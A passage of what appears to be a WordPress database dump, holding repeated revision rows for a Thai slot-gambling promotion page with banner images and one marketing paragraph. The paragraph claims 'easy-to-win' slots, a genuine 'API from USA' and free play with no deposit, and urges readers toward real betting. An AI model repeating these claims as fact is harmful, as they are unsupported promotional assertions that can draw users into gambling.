src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:01:44','2025-10-23 08:01:44','',16,'https://megabet333.biz/?p=90',0,'revision','',0),(91,3,'2025-10-23 08:02:44','2025-10-23 08:02:44','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:02:44','2025-10-23 08:02:44','',16,'https://megabet333.biz/?p=91',0,'revision','',0),(92,3,'2025-10-23 08:02:44','2025-10-23 08:02:44','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:02:44','2025-10-23 08:02:44','',16,'https://megabet333.biz/?p=92',0,'revision','',0),(93,3,'2025-10-23 08:02:44','2025-10-23 08:02:44','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:02:44','2025-10-23 08:02:44','',16,'https://megabet333.biz/?p=93',0,'revision','',0),(94,3,'2025-10-23 08:04:15','2025-10-23 08:04:15','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:04:15','2025-10-23 08:04:15','',16,'https://megabet333.biz/?p=94',0,'revision','',0),(95,3,'2025-10-23 08:04:15','2025-10-23 08:04:15','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:04:15','2025-10-23 08:04:15','',16,'https://megabet333.biz/?p=95',0,'revision','',0),(96,3,'2025-10-23 08:04:16','2025-10-23 08:04:16','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1>','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:04:16','2025-10-23 08:04:16','',16,'https://megabet333.biz/?p=96',0,'revision','',0),(97,3,'2025-10-23 08:08:03','2025-10-23 08:08:03','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1>','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:08:03','2025-10-23 08:08:03','',16,'https://megabet333.biz/?p=97',0,'revision','',0),(98,3,'2025-10-23 08:08:04','2025-10-23 08:08:04','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1>','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:08:04','2025-10-23 08:08:04','',16,'https://megabet333.biz/?p=98',0,'revision','',0),(99,3,'2025-10-23 08:08:04','2025-10-23 08:08:04','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:08:04','2025-10-23 08:08:04','',16,'https://megabet333.biz/?p=99',0,'revision','',0),(100,3,'2025-10-23 08:10:21','2025-10-23 08:10:21','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:10:21','2025-10-23 08:10:21','',16,'https://megabet333.biz/?p=100',0,'revision','',0),(101,3,'2025-10-23 08:10:21','2025-10-23 08:10:21','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:10:21','2025-10-23 08:10:21','',16,'https://megabet333.biz/?p=101',0,'revision','',0),(102,3,'2025-10-23 08:10:21','2025-10-23 08:10:21','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:10:21','2025-10-23 08:10:21','',16,'https://megabet333.biz/?p=102',0,'revision','',0),(104,3,'2025-10-23 08:12:09','2025-10-23 08:12:09','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, 